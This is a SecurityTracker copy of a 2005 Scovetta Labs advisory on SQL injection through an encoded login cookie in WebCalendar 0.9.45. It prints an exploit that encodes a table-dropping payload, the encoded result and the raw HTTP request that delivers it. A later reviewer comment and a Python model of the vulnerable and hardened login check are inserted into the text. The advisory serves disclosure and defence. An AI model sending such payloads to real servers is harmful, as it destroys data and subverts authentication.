SecurityTracker.com
SecurityTracker Archives

Category:   Application (Calendar)  >   WebCalendar Vendors:   Knudsen, Craig
WebCalendar user_valid_crypt() Function Input Validation Error Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013231
SecurityTracker URL:  http://securitytracker.com/id/1013231
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 18 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 0.9.45
Description:   A vulnerability was reported in WebCalendar. A remote user can inject SQL commands.

The user_valid_crypt() function does not properly validate the user-supplied login name carried, in encoded form, in a cookie. The value is decoded and used to compose the SQL query that determines whether the user is authenticated. A remote user can submit a specially crafted, encoded cookie to execute SQL commands on the underlying database.

The vendor was notified on February 1, 2005.

Michael Scovetta of Scovetta Labs discovered this vulnerability.

The original advisory is available at:

http://www.scovettalabs.com/advisory/SCL-2005.001.txt

Impact:   A remote user can execute arbitrary SQL commands on the underlying database.
Solution:   The vendor has released a fixed version (0.9.5), available at:

http://www.k5n.us/downloads.php

Vendor URL:  www.k5n.us/webcalendar.php
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [ SCL-2005.001 ] - WebCalendar: SQL Injection from encoded cookie


=====[BEGIN-SCL-REPORT]=====

________________________________________________________________________

                    Scovetta Labs Security Advisory

  Title:         WebCalendar: SQL Injection from encoded cookie
  Status:        Public
  Release Date:  2005-02-16
________________________________________________________________________

  Package:       WebCalendar
  Vendor:        k5n.us - http://www.k5n.us/webcalendar.php
  Priority:      High
  Vulnerability: SQL Injection


Affected Versions:
==================

  0.9.45 is vulnerable.
  Previous versions have not been tested.


Background: (official description)
===========

  WebCalendar is a PHP-based calendar application that can be configured
  as a single-user calendar, a multi-user calendar for groups of users,
  or as an event calendar viewable by visitors. MySQL, PostgreSQL,
  Oracle, DB2, Interbase, MS SQL Server, or ODBC is required.
  WebCalendar can be downloaded from [1].


Description:
============

  WebCalendar is vulnerable to SQL Injection attacks launched through
  an encoded cookie that is inserted into a request. Using a locally
  installed version, and an MSSQL back-end database (ODBC), we were
  able to drop an arbitrary table from the database by launching an
  attack as a non-authenticated user.


Analysis:
=========

  The user_valid_crypt function (includes/user.php) fails to validate
  that the login name consists of legal characters. This function is
  called from a validation routine (includes/validate.php), with
  data derived from the cookie. The cookie is encoded (not encrypted)
  and consists of data in the following format:

	[login]|[salt][crypt(password, salt)]

  When the cookie is decoded, the login is placed into a SQL query and
  executed. Based on the data returned, the user is either authenticated
  or otherwise the cookie is cleared and the user is directed to login
  again.

  The vulnerability is exacerbated when the underlying database allows
  for multiple SQL queries to be executed together, as in:

	select 1; select 2; select 3;


Exploit:
========

  <?php
    include_once 'includes/init.php';
    echo encode_string("'; drop table foo; select 'a|zzabcdefg");
  ?>

  output:
    7c8c3a738e858f4199b6b386743c7c8e906075c47f7b817993414cb6cd \
    94897d7882858abbb8

  attack payload:

    telnet servername
    GET /login.php HTTP/1.1
    Cookie: webcalendar_session=7c8c3a738e858f4199b6b386743c7c \
            8e906075c47f7b817993414cb6cd94897d7882858abbb8


Work-around:
============

  You can mitigate this by using the following diff patch:

39a40
 >           $login = addslashes($login);
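Review bot: addslashes() on $login escapes rather than validates, while the Analysis section identifies the missing check as validation that the login "consists of legal characters"; addslashes() only backslashes quotes, backslashes and NUL, so a whitelist test on the decoded login that rejects any other character before the query is composed would address the root cause, with a bound parameter as the stronger follow-up. The hunk also carries no file name or context lines: state that line 39 is in includes/user.php (named in the Analysis) and include the surrounding lines so readers on other versions can place the change.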

  The vendor has released version 0.9.5 which includes a fix for
  this issue. All users are encouraged to upgrade to the latest
  version of WebCalendar.
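  The following is an added illustration, not code from WebCalendar or from
  this advisory, of the check the Analysis section describes (cookie decoded
  to [login]|[salt][crypt], login used in a SQL lookup, stored value compared
  with the cookie's hash part) beside a hardened version that applies the
  whitelist validation the Work-around calls for and binds the login as a
  query parameter. It is written in Python over SQLite so it runs offline;
  the hex encoding stands in for WebCalendar's encode_string() (whose real
  transform the advisory does not give), the users(login, passwd) schema is
  constructed, the "stacked statement" back-end is a naive model of the
  multi-query behaviour the advisory reports for MSSQL over ODBC, and the
  allowed login character set is an assumption.

```python
"""Model of a cookie-based login check: the flawed pattern next to a hardened one.
Added example, not WebCalendar code. Assumptions: hex stands in for encode_string(),
the users(login, passwd) schema is constructed, LOGIN_RE is a chosen whitelist."""
import hmac
import re
import sqlite3

# Characters a login may contain (assumption; tighten to the deployment's own rule).
LOGIN_RE = re.compile(r"[A-Za-z0-9_.@-]{1,32}")


def encode_cookie(login: str, salt_and_hash: str) -> str:
    """Stand-in for encode_string(): plain hex of '[login]|[salt][hash]'."""
    return f"{login}|{salt_and_hash}".encode().hex()


def decode_cookie(cookie: str):
    """Reverse of encode_cookie(); returns (login, salt_and_hash) or None if malformed."""
    try:
        raw = bytes.fromhex(cookie).decode()
    except ValueError:  # bad hex or bad UTF-8
        return None
    login, sep, salt_and_hash = raw.partition("|")
    return (login, salt_and_hash) if sep else None


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one user plus an unrelated table to watch."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (login TEXT PRIMARY KEY, passwd TEXT);"
        "CREATE TABLE foo (x INTEGER);"
        "INSERT INTO users VALUES ('alice', 'zzabcdefg');"
    )
    return conn


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def run_stacked(conn: sqlite3.Connection, sql: str) -> list:
    """Naive model of a back-end that runs several ';'-separated statements per
    request (the behaviour the advisory reports for MSSQL over ODBC). Returns the
    rows of the last statement. Splitting on ';' ignores quoting; fine for a model."""
    rows: list = []
    for stmt in (s.strip() for s in sql.split(";")):
        if stmt:
            rows = conn.execute(stmt).fetchall()
    return rows


def user_valid_crypt_vulnerable(conn: sqlite3.Connection, cookie: str) -> bool:
    """The flawed pattern: the decoded login is spliced straight into the query text."""
    decoded = decode_cookie(cookie)
    if decoded is None:
        return False
    login, salt_and_hash = decoded
    rows = run_stacked(conn, f"SELECT passwd FROM users WHERE login = '{login}'")
    return bool(rows) and rows[0][0] == salt_and_hash


def user_valid_crypt_hardened(conn: sqlite3.Connection, cookie: str) -> bool:
    """Validate the login before any SQL is built, then bind it as a parameter."""
    decoded = decode_cookie(cookie)
    if decoded is None:
        return False
    login, salt_and_hash = decoded
    if not LOGIN_RE.fullmatch(login):
        return False  # illegal characters: treat as a bad cookie, never reach the database
    row = conn.execute("SELECT passwd FROM users WHERE login = ?", (login,)).fetchone()
    # Constant-time comparison of the stored value with the cookie's hash part.
    return row is not None and hmac.compare_digest(row[0].encode(), salt_and_hash.encode())


if __name__ == "__main__":
    db = make_db()
    good = encode_cookie("alice", "zzabcdefg")
    bad = encode_cookie("'; drop table foo; select 'a", "zzabcdefg")  # the advisory's payload
    print("hardened, valid cookie:", user_valid_crypt_hardened(db, good))
    print("hardened, crafted cookie:", user_valid_crypt_hardened(db, bad),
          "- table foo present:", table_exists(db, "foo"))
    print("vulnerable, crafted cookie:", user_valid_crypt_vulnerable(db, bad),
          "- table foo present:", table_exists(db, "foo"))
```

  Run stand-alone, the vulnerable path returns False for the crafted cookie
  (the attacker is not authenticated) yet the unrelated table is gone, which
  is exactly the non-authenticated damage the Description reports; the
  hardened path rejects the same cookie before touching the database. The
  whitelist check is what addresses the defect the Analysis names; the bound
  parameter removes the dependence on escaping rules of the particular
  back-end.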


Vendor Response:
================

  2005-01-31 - Vulnerability discovered.
  2005-02-01 - Vendor contacted.
  2005-02-01 - Response received from vendor.
  2005-02-09 - Version 1.0RC2 released on vendor site[2].
  2005-02-16 - Advisory released.


Revision History
================

2005-02-01: Initial Draft
2005-02-14: Public Release [0]


Credits:
========

  Michael Scovetta of Scovetta Labs discovered this vulnerability.


References:
==========

  [0] http://www.scovettalabs.com/advisory/SCL-2005.001.txt
  [1] http://www.k5n.us/webcalendar.php
  [2] http://www.k5n.us/files/WebCalendar-1.0RC2.zip


Disclaimer
==========

  The content of this report is purely informational and meant only
  for the purpose of education and protection. Scovetta Labs and
  Michael Scovetta shall in no event be liable for any damage
  whatsoever, direct or implied, arising from use or spread of this
  information. All identifiers (hostnames, IP addresses, company names,
  individual names etc.) used in examples and demonstrations are used
  only for explanatory purposes and have no connection with any real
  host, company or individual. In no event should it be assumed that
  use of these names means specific hosts, companies or individuals
  are vulnerable to any attacks nor does it mean that they consent to
  being used in any vulnerability tests. The use of information in
  this report is entirely at user's risk.


Copyright
=========

  (c) 2005 Michael Scovetta. Forwarding and publishing of this document
  is permitted providing the content between "[BEGIN-SCL-REPORT]" and
  "[END-SCL-REPORT]" marks remains unchanged.


=====[END-SCL-REPORT]=====


-- 
Michael Scovetta
Scovetta Labs
www.scovettalabs.com

Copyright 2019, SecurityGlobal.net LLC